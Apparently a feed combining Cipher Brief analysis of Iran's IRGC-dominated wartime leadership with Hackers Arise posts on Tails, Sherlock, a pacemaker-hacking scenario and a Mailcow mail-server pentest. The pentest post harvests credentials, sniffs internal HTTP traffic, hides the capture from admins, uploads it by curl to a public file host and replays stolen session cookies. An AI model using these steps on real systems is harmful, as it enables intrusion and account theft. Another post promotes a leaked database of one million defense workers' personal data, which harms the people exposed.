“When military leaders assume control as heads of state in wartime, they tend to make worst-case assumptions about adversaries’ intentions, view compromise as weakness, and favor offensive military strategies over defensive ones,” Kelanic points out.

Roule, meanwhile, frames the Guard’s rise in institutional rather than personal terms, and says the war has widened rather than preserved its reach. Estimates of how much of Iran’s economy the IRGC touches “vary widely — roughly from a fifth to a third,” he says, depending on whether one counts only directly controlled firms or also affiliated holding companies, pension funds and sanctions-evasion networks.

“A better way to think about the IRGC is not simply as a military organization with commercial interests, but as a central actor in a state-security-economic network,” Roule notes.

Ghalibaf’s Quiet Climb to the Center

The other figure benefiting from the uncertainty at the top is Ghalibaf, the parliament speaker and former IRGC commander who has spent the war years turning what is traditionally a legislative post into something closer to a shadow foreign ministry.

Ghalibaf, a two-time presidential also-ran who trailed Pezeshkian in the first round of the 2024 election, has emerged as Tehran’s principal interlocutor in the indirect talks with Washington, serving simultaneously as Iran’s special envoy to China and as a bridge between the political and military-security establishments that Pezeshkian, a physician by training with no roots in the security services, has struggled to command.

Parliament re-elected Ghalibaf to a seventh consecutive term as speaker in late May, with 235 of 271 votes cast, as reports circulated of friction between Pezeshkian and the new Supreme Leader’s office. Judiciary chief Mohseni-Ejei congratulated Ghalibaf on the vote by calling him a “tireless and battle-hardened jihadist leader” who had waged jihad “both in the field and in diplomacy” during the war.

Roule warns against reading Ghalibaf’s prominence as a formal power grab.

“His current prominence should not be confused with general supremacy over Pezeshkian,” he says. “Pezeshkian nonetheless remains president, heads the executive branch, and formally chairs the Supreme National Security Council. There is no evidence that Ghalibaf has assumed any of the presidency’s general constitutional authorities.”

His influence, Roule highlights, “is best understood as issue-specific power produced by circumstances, his political standing, longstanding IRGC relationships, and wartime delegation.”

Who Actually Holds the Reins

What emerges from the past five months of conflict, however, is a regime governed less by the clerical hierarchy that has defined the Islamic Republic since 1979 than by an overlapping wartime trio.

A Supreme Leader whose authority is formally absolute but whose physical capacity to exercise it remains unverified. An IRGC command structure rebuilt twice over through assassination and now operating with wide latitude, alongside a parliament speaker who has converted legislative standing into genuine diplomatic weight.

Still, Roule sees continuity as the most likely outcome even if Mojtaba’s health worsens further.

“If Mojtaba Khamenei becomes seriously incapacitated or dies, the most likely outcome absent a successful mass uprising or a major elite fracture is continuity rather than reversal on the issues of greatest concern to the United States,” he says. “The IRGC would remain a central power center, and the system has constitutional procedures for interim leadership and selection of a successor.”

He also points out that if Mojtaba’s death were tied to the war, “the state would almost certainly use a martyrdom narrative to reinforce regime legitimacy and resistance.”

Kelanic is less sanguine about what that continuity means for diplomacy. Iran, she stresses, will also grow harder to negotiate with simply because power is now split among rivals rather than concentrated in one office, leaving Washington without a clear address for any deal.

“The IRGC’s strengthened rule over a weaker civilian leadership makes reaching a peace deal harder,” Kelanic adds, “which is one of many ways the Iran War has backfired.”

The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals. Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.

Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.

Read more expert-driven national security insights, perspective and analysis in The Cipher Brief

Pentesting: Taking Over A Corporate Mail – Mailcow

Welcome back, cyberwarriors.

It’s Collateral here again. Today we want to show you an attack vector that can bypass password complexity and 2FA. It was successful during one of our latest pentests. The environment we were testing was complex with segmented networks. In a situation like that, the best move is usually traffic analysis.

During the pentest we got access to a machine used for corporate mail. No details were given about the machine or the environment around it, but we noticed that the host was running multiple Docker containers. On the surface it looked like the company had done a decent job hardening things. Looking manually for configs across all these different apps is always a pain, so we used LaZagne instead to look for credentials.

LaZagne

LaZagne is a credential recovery tool that can parse configs and find credentials in them. It’s pretty easy to work with and the output looks clean. The tool can often find passwords buried in odd locations.

bash# > python3 laZagne.py

Not every entry you see will be a valid login, but most of the passwords are usable. We found the root credentials for MySQL which gave us database access. That’s already enough to temporarily adjust the password entries to analyze mail overnight.

# Docker shows 127.0.0.1:13306->3306/tcp

bash# > mysql -h 127.0.0.1 -P 13306 -u root -p

The password hashes used BLF-CRYPT format, which can be reproduced using the container itself, if you actually decide to manipulate the entries.

Network Traffic Analysis

These password hashes won’t help, because they’re slow to crack and some of them are backed by 2FA. Logging in with a cracked password might trigger a verification code sent to the user’s phone, which will definitely raise alarms.

For this attack we used tcpdump. A lot of people won’t like it because it’s a CLI tool and it’s boring writing those long oneliners explaining what you want to capture, but it’s quite powerful. It helped us understand the network’s behavior and find out which services were in use. You can still open your pcaps in Wireshark if you want to. Or better yet NetworkMiner, which will dissect every packet and sort all the findings. It’s often used for quick credential searches in pcaps because the filters are really strong

Above you can see a general traffic capture to get a sense of the environment. In secure networks where active scanning with nmap and other tools gets flagged, tcpdump is a better choice. By looking through the traffic flow, we can see the communication paths. We focused on HTTP traffic and found POST requests made to the mail server. The requests showed the internal proxy, where a publicly accessible mail portal forwarded traffic to a local Linux machine.

As you can see, the request contains the original IP address. Even though the main site used HTTPS, internal traffic was still HTTP. It’s a pretty common mistake.

Looks pretty good, right? They still think so.

Identifying the Port

To capture the credentials we had to find the correct port. It wasn’t on the usual 80 or 8080. If you look closely at the POST request, you will find it. It was 20000. That’s security through obscurity, as OTW says.

With that in hand, we started capturing the traffic:

bash# > tcpdump -i interface tcp port 20000 -w /etc/systemd/20k_01.pcap

Change the interface name to match yours and always store captures in obscure locations. Keep in mind, the tcpdump process will show up in the process list, unless the you use Zapper to hide it.

bash# > ps aux | grep tcpdump

Give it a few hours during the busy day and come back for your traffic capture. It’s always better to find the necessary ports and listen to their traffic instead of throwing a full capture at everything. The size will grow fast and the admins will notice a problem soon enough, especially if there isn’t much storage left to begin with.

# Upload the pcap to a free file host

bash# > file=20k_01.pcap
bash# > curl -F "reqtype=fileupload" -F "fileToUpload=@$file" https://catbox.moe/user/api.php

# It will give you the link in the output  

Next go to Wireshark, click File > Export objects > HTTP.

Export everything and read through all the connect packets.

kali > cat connect * | jq .

As you can see, the passwords were really complex, but this didn’t really help. Some accounts had 2FA, but if you have valid session cookies, you don’t need the password or the 2FA code. Just import them into your browser using Cookie-Editor and you’re in.

Streamlining With TCPDump

Once you know what to look for, you can grep the keywords you need:

kali > tcpdump -A -r 20k_05.pcap port 20000 | grep “userName”

As you can see, the passwords were really complex, but this didn’t really help. Some accounts had 2FA, but if you have valid session cookies, you don’t need the password or the 2FA code. Just import them into your browser using an extension like Cookie-Editor and you’re in.

We found folders labeled “Accesses” and “VM”. Emails showed the company hosted client services on virtual machines. All the credentials for the VMs were stored in plaintext, which is basically a goldmine for lateral movement and pivot.

Conclusion

Network traffic isn’t always the first thing hackers and pentesters go with, but that underestimates it significantly. As you’ve seen, there’s a lot that can be found in it if you dedicate some time. Seeing HTTP used inside organizations is so common. That’s a very common mistake that leaves all the communication wide open. So if you know how to look for things, you’ll find your answer in a subtle way. All this company noise is an opportunity during a pentest for us.

The post Pentesting: Taking Over A Corporate Mail – Mailcow first appeared on Hackers Arise.

Open Source Intelligence (OSINT): Ukrainian Hacktivists Publish Massive Database of Russian Defense Facilities and Employee Data

Welcome back, aspiring cyberwarriors!

In the ongoing war between Ukraine and Russia, the battlefield has expanded far beyond trenches and artillery positions. In previous articles, we discussed how hackers attack Russian SCADA/ICS systems, conduct reconnaissance by hacking cameras, and much more. Hacktivists operate alongside conventional military forces to degrade enemy capabilities.

Recently, Ukrainian OSINT communities have published an interactive map cataloging 6,088 Russian defense factories, complete with detailed personal information on 1.2 million employees working within Russia’s military-industrial complex. This isn’t simply a list of company names and addresses. The database includes passport numbers, phone numbers, email addresses, and home addresses for over a million individuals involved in producing everything from missile systems and ammunition to drones and electronic warfare equipment.

In this article, we will analyze this database and explore how it may assist hackers in future cyber operations. Let’s get rolling!

Fire Up the Map

To get started with the map, open the website https://map.osint-varta.com/ in your browser. The site’s default language is Ukrainian, but you can easily translate the content using the built-in translator in your browser or by using a translation plugin.

Upon opening the website, you will see an interactive map displaying defense factories.

The website catalogs 6,088 enterprises spanning from Kaliningrad to Vladivostok, including factories involved in weapon production, repairs, and support infrastructure. All these factories are sorted by 16 production sectors for precise searches. For example:

Key Component Manufacturing (1,320 enterprises) – Suppliers of critical parts like electronics and materials.

Repair, Modernization, and Maintenance (1,231 enterprises) – Facilities keeping Russia’s arsenal operational.

Radioelectronics and Electronic Warfare (420 enterprises) – Tech for jamming signals and cyber defenses.

And more, covering everything from small arms to chemical protection gear.

By scrolling down, we can see company categories organized by sector, sanction status, and risk indicators.

Let’s take a closer look at the Radioelectronics and EW category. Here, we can access a well-organized page that allows us to search for the required company.

For example, let’s explore LLC “RESONANCE” in more detail.

At the top of the page, we find a wealth of information, such as whether the company is under sanctions, what it produces, a description of the company, and other relevant details. By scrolling down, we can access even more valuable information, including employee details.

This information includes names, passport data, email addresses, phone numbers, and locations – all of which can be easily exported as a CSV file.

Additionally, in the navigation bar, we can click “Managers” to search for CEOs and founders. The webpage provides the Tax Identification Number, positions, and relationships with the companies.

If you find the lists unclear, the website also provides graphs that illustrate the relationships between the companies.

Summary

The recently published database by Ukrainian OSINT communities offers a significant resource for understanding Russia’s military-industrial complex. The interactive map provides in-depth details about each company, including employee data that could be leveraged in future cyber endeavors.

For further insights into cyber operations and OSINT, consider our Subscriber Pro training package.

The post Open Source Intelligence (OSINT): Ukrainian Hacktivists Publish Massive Database of Russian Defense Facilities and Employee Data first appeared on Hackers Arise.

The “Homeland” VP Pacemaker Hack: Is This Attack Realistic?

Welcome back, my aspiring cyberwarriors!

IoT hacking is one the cutting-edge fields of cybersecurity. This includes IP cameras, Bluetooth devices, Home Security systems, Smart Home devices, and well…unfortunately, medical devices. Each of these devices is vulnerable to attackers taking control of the device, using it in a botnet, or even using it as foothold within your network to pivot to more valuable systems in your home or office.

I really enjoy when mass media depicts hackers accurately. Most TV shows and movies make the hackers look like wizards with superpowers but, in reality, we are just regular people…with superpowers. Mr Robot is my favorite show because it depicts real hacks and hacking.

Often, art imitates and life, and sometimes life imitates art. There was an intriguing TV show a few years back called Homeland. It was about an American soldier captured in Iraq who is turned against his country. When he is released from captivity and sent back to the US, he is determined to exact his revenge upon the US Vice-President who had committed war crimes in Iraq that he witnessed (most people would infer that this character is the former US VP, Dick Cheney). To do so, he attempts to hack his heart pacemaker. Is this hack real?

Let’s examine it.

The Scene

In the show, Nicholas Brody, the American soldier, assassinates the U.S. Vice President by hacking his heart pacemaker. In this case, Brody learns the VP has a heart pacemaker (the real-life Cheney does have a pacemaker) with wireless management capability to make it easier for doctor to monitor and control. Brody then gets the device’s serial number via a corrupt congressman. He then remotely connects to the pacemaker using the serial number and sends a lethal command, causing the VP’s heart to fail instantly killing the Vice-President and accomplishing his mission.

How Real Is This?

This scene is not pure fiction. The Homeland scenario is dramatized, but the core risk is real. A famous hacker known as Barnaby Jack, developed a hack that he said could kill someone from 50ft away. Suspiciously, he died suddenly before he could give the details at a cybersecurity conference.

Here are the steps necessary to execute (no pun intended) this attack.

Step 1. Wireless Medical Devices Are Vulnerable

  • Many pacemakers and implantable cardioverter-defibrillators (ICDs) use wireless protocols (like Bluetooth or proprietary RF) to communicate with doctors’ equipment for monitoring and reprogramming.
  • Security researchers have shown these wireless links can be intercepted or spoofed, especially if encryption/authentication is weak or missing.

Step 2. Serial Numbers and Authentication

  • In Homeland, the serial number is used as a “password.” In reality, some devices have used static or easily guessable credentials, and some have been shown to accept commands with minimal authentication.
  • Security researchers (like Barnaby Jack) have demonstrated attacks requiring only proximity and a bit of device info to take control of pacemakers and ICDs.

Step 3. What Can a Hacker Do?

  • Pacemakers: Typically, they only deliver low-voltage pulses to regulate heartbeat. They cannot deliver a lethal shock.
  • ICDs: These can deliver high-voltage shocks to correct dangerous arrhythmias. If hacked, an attacker could theoretically trigger a shock at the wrong time, potentially inducing heart attack.
  • Remote attacks: If the device is internet-connected (directly or via a paired device), attacks could be launched from anywhere.

Step 4. Real-World Paranoia

  • Former VP Dick Cheney had the wireless feature of his own ICD disabled out of fear of assassination by hacking.
  • The FDA has recalled devices over vulnerabilities, and researchers have repeatedly shown proof-of-concept hacks on medical devices

Attack Chain: How a Real-World Pacemaker/ICD Hack Might Work

StepTechnique/Vector
ReconIdentify device make/model (hospital records, social engineering, physical access)
Info GatheringObtain serial number (physical inspection, medical leaks, social engineering)
Wireless ProbingUse SDR, Bluetooth, or RF tools to sniff device traffic
Authentication BypassExploit weak/no authentication to connect
Command InjectionSend malicious commands (change pacing, trigger shock on ICD)
ImpactDisrupt heart rhythm, potentially cause cardiac event

Why This Matters to You

  • Medical devices are computers: Old, unpatched, and often lacking basic security controls.
  • Attack surface is growing: More devices connect via Wi-Fi, Bluetooth, or even the internet for remote monitoring.
  • Life-and-death consequences: Unlike most hacks, these can kill.

Summary

Although the Homeland hack is dramatized, the underlying threat is real. IoT hacking is among the most important fields of cybersecurity and is often overlooked. IoT devices, like this heart-pacemaker, are often shipped with little concern for security. If the medical device industry does not up its cybersecurity game, sadly, people will die.

As a hacker or defender, know that:

  • Medical device security is often an afterthought.
  • Wireless and networked implants are vulnerable to attack if not properly secured.
  • Physical and cyber hygiene (disabling wireless, patching firmware, strong authentication) is critical for life-critical systems.

Look for our upcoming Medical Device Hacking training

The post The “Homeland” VP Pacemaker Hack: Is This Attack Realistic? first appeared on Hackers Arise.

Open-Source Intelligence(OSINT): Sherlock – The Ultimate Username Enumeration Tool

Welcome back, aspiring OSINT investigators!

Most people are actively represented on social media. Moreover, they maintain their pages quite actively and publish a huge amount of interesting information about themselves. Therefore, if a person caught our attention during OSINT, it definitely makes sense to find their social media pages and examine them.

In this article, we will figure out how to effectively search by nickname using the Sherlock utility. Let’s get rolling!

What Does Sherlock Do?

Sherlock is an open-source OSINT tool designed to find usernames across a wide range of social networks and websites. It can currently check for a given username across 400+ websites and platforms, allowing investigators to quickly determine where a username is active.

Sherlock is designed to be straightforward for open source investigations: it does not require API keys or login credentials for the sites it checks; instead, it simply constructs the expected profile URL for each site and observes the response to determine whether the username exists on a given platform. This means it only accesses publicly available information and cannot bypass privacy settings or account restrictions.

Sherlock Installation & Usage

To install Sherlock, open a Linux terminal and run the command below.

kali> sudo apt install sherlock

Once the installation is complete, verify that Sherlock is installed correctly by running the help command:

kali> sherlock –help

After reviewing the help, we can move on directly to the search. We can do this by simply running the following command in the terminal:

kali> sherlock <username>

After some time, we can see 49 positive results. However, as with any tool, it’s important to verify whether these profiles match the person you’re searching for.

The results will be saved to a .txt file named after the search term. But according to the help screen, we can save the results in XLSX and CSV formats as well.

kali> sherlock <username> –csv

In the screenshot above, you can see at the top the command itself and at the bottom the results in CSV format.

Another valuable feature is limiting the scope to certain sites, for example, Instagram and GitHub.

kali> sherlock <username> –site GitHub –site Instagram

Moreover, we can modify the timeout and route requests through a proxy. The default timeout is 60 seconds, but let’s try reducing it to 1 second.

kali> sherlock –timeout 1 <username>

Summary

Sherlock is a powerful OSINT tool that offers a fast and efficient way to search for social media profiles across multiple platforms. It’s definitely one to add to your research toolbox!

If you want to improve your OSINT skills, check out this OSINT Investigator Bundle. It covers both fundamental and advanced techniques and includes an OSINT Certified Investigator Voucher.

The post Open-Source Intelligence(OSINT): Sherlock – The Ultimate Username Enumeration Tool first appeared on Hackers Arise.

There Will be Unseen Costs to be Paid over the War in Iran. Who is Weighing Them?



EXPERT INTERVIEW – With an interim agreement expected as early as today between the U.S. and Iran aimed at reopening the Strait of Hormuz to shipping traffic, experts are assessing the short and long-term costs of any deal.

As negotiators work on an agreement to re-implement a ceasefire and restart negotiations aimed at curbing Iran’s nuclear ambitions, there are questions about whether Iran will end up with more control over the strait than it enjoyed prior to the war and about the hidden costs that could include impacts on the sanctions packages that the U.S. has been using as a diplomacy tool to try and keep Iran’s malicious activities in check.

Cipher Brief Executive Editor Brad Christian spoke in-depth with former National Intelligence Manager for Iran at ODNI Norm Roule about the current “operational pause” and about the unseen costs of any deal. Their conversation has been lightly edited for length and clarity. You can also watch the interview on The Cipher Brief’s YouTube Channel.

THE INTERVIEW

Norman T. Roule

Norman Roule is a geopolitical and energy consultant who served for 34 years in the Central Intelligence Agency, managing numerous programs relating to Iran and the Middle East. He also served as the National Intelligence Manager for Iran (NIM-I)\n at ODNI, where he was responsible for all aspects of national intelligence policy related to Iran.

Christian: The situation with Iran has continued to progress in ways that maybe people didn't expect or anticipate when this war started. How do you describe where we are right now in terms of progress toward ending this war?

Roule: Where we are right now is in a lull. This is an operational pause. We're not approaching a significant core agreement. This is instead a period of coercive restraint. It's not a ceasefire. And Iran has continued to attack ships, but you're seeing the U.S. restrain its response again here to give diplomacy a chance. The president is showing considerable restraint. At the same time, the assets we have in the region are immensely powerful, immensely capable, and very well led. So, they have everything they need to do to undertake the dramatic operations the president has discussed. The diplomacy itself that's underway is a challenge. Each side is describing it dramatically differently.

If you look at the position of each side, there has been a consistent trend. The U.S. will announce negotiations, and the Iranians will deny negotiations are taking place. A few days later, there will be indirect negotiations through regional parties, still accomplishing the same things, but we're not at the table to talk about nuclear issues, missile issues, or militia issues as originally discussed.

The Iran-Oman mechanism that's being talked about right now in the press is likely being overstated by the Iranians and by some who would believe that concessions to Iran are the appropriate outcome from this crisis. Here's why it's being overstated: If tolls of any sort are charged, what happens to a shipper who refuses to pay? How does work in association with sanctions that have been imposed by the United States? Are American ships and American-related ships, allowed to pay Iran money? Through what mechanisms, what channels? Will we sanction other countries for paying Iran money through these channels? Iran has dictated which countries can enter the Persian Gulf and the bulk of this channel is through Iranian waters, but according to press reports, the Omanis must tell the Iranians who is transiting south. Iran's parliament has said no enemy countries can transit. Are Israeli or Israeli-related ships then banned from the Gulf? These are these are hugely consequential questions that are being glossed over by those who would say, ‘well, a deal is being worked out’. But this situation does show that while the U.S. absolutely has the military edge, it is restraining itself, and that has given Iran an ability to influence some would say, ‘control the pace’ of shipping in the Gulf. That shipping continues, and I've seen reports that as many as five million barrels of oil a day are now moving through the strait, which is going to reduce the pressure on oil markets, but this remains an unreliable waterway. Insurance rates remain very high and will remain high. And the blockade, of course, remains in place. This is a very delicate situation.

We also have to consider what happens if the Houthis look at the Iranian Oman deal and say, we want the same deal regarding the Bab el-Mandeb. What is the premise to refuse that? What would we do if the Houthis responded in their own way to attacking ships in the Red Sea?

So, we're in a very consequential period. And this is a period consequential for Iran because they're also in dire need of economic assistance. Their inflation is about 70%. Unemployment is horrific in many locations. I've seen figures as high as forty to forty-five percent in some areas. And the Iranians of course are showing defiance and claiming this isn't a problem, but this has got to be touching their decision making. And I think that's something the White House is considering.

Christian: President Trump has been very clear on where he stands on the issue of paying fees for passing through the Strait of Hormuz. Why is Iran pushing this issue when there were no fees in place before the war started? Is this one of Iran's most powerful points of leverage that they have over the strait? How are you thinking about their position on these fees?

Roule: It's a good question and I'm not putting a value judgment on it. I've tried to remain neutral on these issues. But those who advocate for making a deal with Iran, you know, diplomacy comes with severe consequences. If Iran is able to acquire control over the strait, will that collapse the international sanctions regime? For example, if Iran is able to control the strait in this regard, can it dictate which food shippers can come into Kuwait? If Iran controls the strait, it now has a permanent foot on the throat of the international community. And the idea that if we just do this, we can then build on trust with an IRGC government has no evidence in reality. Now that doesn't mean that it may not happen, but those who say you can build on this are not producing an argument that makes sense. Iran would be able to inject considerable power projection into the region in an unprecedented way, gaining billions of dollars, and that money would inevitably go to its missile program and proxies. And those who talk diplomacy with Iran, and you can see this when you look at social media statements or foreign affairs articles. The authors who speak most passionately and eloquently about engagement with Iran can't seem to acknowledge that people will die as a consequence. Now, that makes me sound like I'm opposed to this but I'm just giving you all the reasons why this is a problem.

The region, of course, has no desire for Iran to have this capability. But they also have no desire for a missile and drone war. That you either have a drone war, missile war, or give in to Iran, those are usually statements made by people who aren't professional diplomats, professional policymakers or have little understanding of the regional issues. There's going to be some sort of path in the middle that works if we're to protect and preserve sanctions as our tool against Iran's terrorism and other activities and if we’re to protect and preserve the national sovereignty and security of these countries who are our partners.

Also in the details of this deal are questions over whether the U.S. military would be banned from the Persian Gulf. The Iranians would have to approve the passage of U.S. military ships, which of course we wouldn't agree to, but the Iranians could claim that as a violation and things could unravel. We're going to land in a gray area on this if diplomacy is to succeed and it may not succeed.

Christian: In public statements, President Trump seems to be losing patience with the process. The president has said before that if Iran doesn't make this deal, that's it and we've witnessed similar red line crescendo moments before. You mentioned the IRGC led government. It's clear that they are running the country now. It's not clear how the diplomatic process is working, certainly by historical standards. What are your potential measures of success or indicators that the diplomatic process has run its course and what are you watching as potential next steps?

Roule: Throughout the last twenty years, various administrations, Democratic and Republican, have each said the same thing that we will try every possible diplomatic option for as long as possible and that all responses remain on the table. But once we've shown the world that we have tried every diplomatic option and the Iranians won't take yes for an answer, won't take diplomacy for an answer, then we'll be justified in using force.

I've been in congressional testimony where I've had Republicans and Democratic State Department officials insist that was U.S. policy. And that is congruent with the President's statements. He's basically saying, ‘Look, I'm going to give them every opportunity to negotiate’ because the consequences of a much broader conflict for the region, for the Iranian people, for civilians, for the U.S. war fighters who are risking their lives in the region, all of this will come into play.

We do have the assets in the region and our leadership in the military force there is exceptional and highly experienced. And based on the nature of the attacks conducted by the U.S. military in recent weeks, one can deduce a couple of points.

The first is that we know a lot about Iran's military architecture. And second, Iran has very little defense against our attacks because we've seen very little air defense or port defense as a result. Iran only has an offensive capacity. And it's attacking civilian architecture as well as U.S. military bases, not being used by the U.S. military, but nonetheless, they're bases where we have that presence. But at some point, if you believe in international values, we we've got to stand with our partners to protect them in a way that is congruent with their national interest and leadership approaches.

Christian: Over the weekend, news reports indicated that the Gulf states were the ones that convinced President Trump to not escalate this war right now. Do you have a sense of where the Gulf states are right now in terms of their approach to President Trump, their approach to Iran?

Roule: I think you need to have several different pillars in mind. First, let's talk about what the Gulf States have done that has been quite successful. Their defense against Iran has been very, very successful as a result of years of engagement with the United States and with the U.S. private sector, which is playing a large role in their successes and will play a role in their future successes in terms of defending against cyberattacks and drone and missile attacks. No air defense is perfect, but the performance by the GCC has been exceptional. And they have protected three things that we should applaud.

First, they've protected their own nationals and their own infrastructure, which is the duty of every state. They're protecting millions of other citizens to include hundreds of thousands of Americans who live in the region. They're keeping American lives safe with their air defense. And last, they've protected the international economy, preserving through their energy flows and their handling of the situation, the ability to maintain stable energy prices and distillate impact on subsidiary industries. All of that is exceptional.

At the same time, we've seen the Saudi military crisply respond to Houthi aggression with surgical strikes, and the Saudi military joining with the United States on strikes on Iraq, which is a first. And it's also a demonstration of the quality of Saudi Air Forces in general. So, there's a sense of extremely close partnership between our militaries. But how they move forward, you know, it is their neighborhood, so how they move forward in a world where there could be a major attack on Iran is likely going to mean that they're going to face more missile and drone attacks. They're going to want a voice in this.

They know their region better than we do. We should respect that. And I think that's what you saw last week in the reports of phone calls to the president, where he gave diplomacy a chance and was about to move, and I believe he was serious, based on my understanding. But he also took into consideration partners, people who have lives on the line and are trying to defend the world's economy and know their neighborhood very well. So, I'm not unhappy with what's happened. I don't think you can criticize that. That's a natural, organic and appropriate process.

Christian: Let's talk gray zone just for a moment. We've seen reports recently that the hacks against the water infrastructure in Minnesota could have involved Iran. We've seen reports that China, although not confirmed, was planning to deliver air defense systems to Iran. There's no doubt about the cooperation continuing between Russia and Iran. What are you looking at that some of us may be missing?

Roule: Press reports confirm what many observers have cited, and that is that Iran's cyber activities have continued unabated since this conflict began. Indeed, before the conflict, against multiple actors in the United States and largely that's been successfully defended against by our national cyber architecture, as well as the architecture of our Gulf partners. The president has disagreed with the assessment on Minnesota and other places, but that does fit with the past pattern of Iranian cyber activity against SCADA and other systems in the United States. and has been a longtime target of Iran itself. It is an attack on our national infrastructure, if it's proven. And if proven and we don't respond to it, the people in Tehran are going to say, ‘Well, there's no reason we shouldn't continue to do this’. So, I think that issue itself is pushing the White House towards alternative actions besides diplomacy. And in fairness, it has been a traditional standpoint of multiple administrations to say how we respond. Is it at a time and way of our choosing? We don't respond symmetrically, you know, we don't do the exact same thing back. So, if the United States were to respond with airstrikes against Iran’s cyber architecture, which would probably be a good thing in a conflict, that is an appropriate proportional response just done differently. And it would be congruent with multiple administrations' views and statements as to how they will treat Iranian aggression.

Christian: What are you looking for next? What are you paying the most attention to?

Roule: As I mentioned, if you give Iran control of the Strait of Hormuz, you're going to have consequences, not only in terms of whether they will ever negotiate seriously with us, but what does it mean for the Red Sea, and all sorts of other things? And those who say, well, we can work past that usually aren't in the Gulf, usually don't have children fighting right now and usually won't pay the price of those decisions. Not to say they won't be made, but we need to be upfront on those costs, and some of the issues aren't being discussed.

What I'm looking for is the conversation about those costs. And if it doesn't happen, that's a bad thing for everybody. The other issue is I think we need to look at is how the U.S. is going to respond to continued Iranian aggression. When does the U.S. restrain itself? Right now, the president is clearly, as he's announced, looking at de-escalation. But if the Iranians continue to probe with cyberattacks and missile and drone strikes, they've got to be addressed in a way that says to Iran, that there is a material price to be paid for that.

In the negotiating channels, I would look for any evidence that the U.S. is now directly dealing with the Iranians. That's unlikely to happen in the near term. That doesn't mean that diplomacy isn't occurring robustly through our partners, but any evidence of direct negotiations with the U.S. would be a very significant uptick.

And last, I would look for someone to address the issue of how any payments to Iran, involuntarily or otherwise, will impact the sanctions regime. Failure to address that is irresponsible in a policy world and indicates that maybe that's not being taken seriously.

And maybe one more point, and that is we should expect rhetoric on each side, but we should focus on what happens on the ground via the effervescent statements that are so often in the media.

Read more national security insights from experienced experts exclusively in The Cipher Brief.

Remaining Anonymous: Getting Started with Tails

Welcome back, aspiring cyber warriors and privacy-conscious readers!

After a full-scale invasion of Ukraine, the number of Tor bridge users has grown. End-to-end encrypted messengers like Signal went to the charts. People around the world realize the value of privacy, because when you’re fighting, information might cost you a life.

If you want more privacy on the Internet, the operating system that you use is playing a crucial role. Common to everyone, Windows and macOS are really comfortable in use but also collect a lot of information about you. So it’s time for Linux. Specifically, Tails.

What is Tails?

Tails (The Amnesic Incognito Live System) is an open-source Debian-based portable operating system that runs from a USB flash drive. All connections are forced through a Tor network. All information is loaded into RAM, so when you shut down the PC, all your evidence is lost.

There is a widespread opinion online that Tails is, like, a super anonymous operating system. That is not entirely true. Of course, it does provide anonymity. But that comes through the Tor network, support for network bridges, and automatic MAC address spoofing, which is great, but nowadays that is hardly surprising.

In reality, Tails is more about portability and security, both for your data and for the user themselves. You can have a secure operating system at hand, configured the way you need it, with the software you need. So, you can use it on any computer without worrying about leaving traces.

Installing

To download the Tails image, visit the official site tails.net. Pick your operating system from the list. In our case, it’s Linux.

It is recommended to ensure the integrity of the downloaded image by checking for any corruption using the form on the website after completing the download.

The next step is installing Tails using gnome-disks. If you don’t have it installed, run sudo apt install gnome-disk-utility. Plug in the USB stick on which you want to install Tails and start Disk Manager. After a new drive appears on the left panel, click on it. Be careful to choose the correct option, so you don’t overwrite your host OS.

Click on the three dots in the titlebar and choose Restore Disk Image. Choose the downloaded image, start restoring it, and take a break.

After restoring, you’ll have a USB stick with an installed Tails OS. The next step is changing the boot order in the BIOS. Booting into the BIOS will depend on your device manufacturer, so Google will help.

When the computer starts after changes in the BIOS, you will see the bootloader with options. Choose the first one.

Every time Tails boots, you will be greeted by the screen below.

Here you can make some changes to the system by clicking on the plus sign.

If you plan to use sudo, for example to install software, you need to set an administrator password (it is disabled by default). MAC address spoofing is also enabled by default in Tails. Here, you can also disable the internet entirely or allow only Tor Browser to be used.

After selecting the initial settings in the welcome window, click Start Tails.

You’ll see the Tor connection settings like below.

That’s it! Now you have a functional OS that runs from the USB and wipes all the data when you turn it off.

Features

Firstly, I want to mention that in addition to the usual shutdown methods, there is a faster alternative: if you simply pull the Tails USB flash drive out of the computer, the system will automatically shut down. However, if a protected partition is mounted, it may be damaged, so this method should be used only in extreme cases.

Secondly, Tails by default has Metadata Cleaner and Mat2 apps to remove metadata from files. Metadata is used to describe, identify, categorize, and sort files, but can also be used to deanonymize users and expose private information.

Thirdly, Tails supports both LUKS and VeraCrypt encrypted volumes.

Tails developers recommend using VeraCrypt to share encrypted files across different operating systems, and using LUKS to encrypt files for Tails and Linux.

Summary

Tails is a good choice for storing truly important files and documents, allowing them to be quickly transferred in encrypted form and backed up quickly to other storage media. Also, it’s suitable for use on other people’s computers. You can be confident that it won’t leave any traces on the host OS.

However, if you’re looking for true anonymity against big tech or somebody else, you need to dive deeper. Just Tails won’t help you much. Therefore, you’re invited to visit our Remaining Anonymous training on August 11-13.

The post Remaining Anonymous: Getting Started with Tails first appeared on Hackers Arise.

Why the Iran War Remains Strategically Adrift

“I do think there's a lot of evidence to believe that we're accomplishing the military objectives [of the Iran War], which is destroying the Iranian Navy, the Iranian Air Force, their air defenses, the missile production capabilities, drone production capabilities. That's going well. But how that translates into strategic success has been, I think, the weakness in this entire operation and continues to be today. And I think that if we were to take a step back to February [when the Iran War started], and think about where we are today, I don't know that this would be in our theory of success. It would probably be a branch plan that would not be going so well. And I'm worried about that.”

That was retired-Air Force Lt. Gen. S. Clinton Hinote, former Deputy Chief of Staff for Strategy, Integration, and Requirements, now a professor of policy analysis at the RAND School of Public Policy and a non-resident adviser to the Center for Strategic and International Studies (CSIS) Aerospace Security Project.

He was speaking on July 23, at a CSIS event, The Air Campaign Returns: From Epic Fury to Midnight Hammer, along with retired-Air Force Gen. James Slife, former Vice Chief of Staff of the Air Force, former Commander of Air Force Special Operations Command, and also a non-resident adviser to CSIS’ Aerospace Security Project.

The two former senior Air Force officers not only gave their frank views of the Iran War, but also discussed the future of warfare and its impact on the Air Force and other U.S. military forces. I will start with their views on Iran and the war and then move on to other subjects they dealt with.

Since the Strait of Hormuz is central right now, let’s begin with their views on the Strait which I found inciteful.

Ret.-Gen. Slife began by pointing out, “Military planners have struggled with the Strait of Hormuz challenge for years and years. I mean I don't think it's any surprise to anybody that's paying attention to how this has played out, because geography favors Iran in the Strait.”

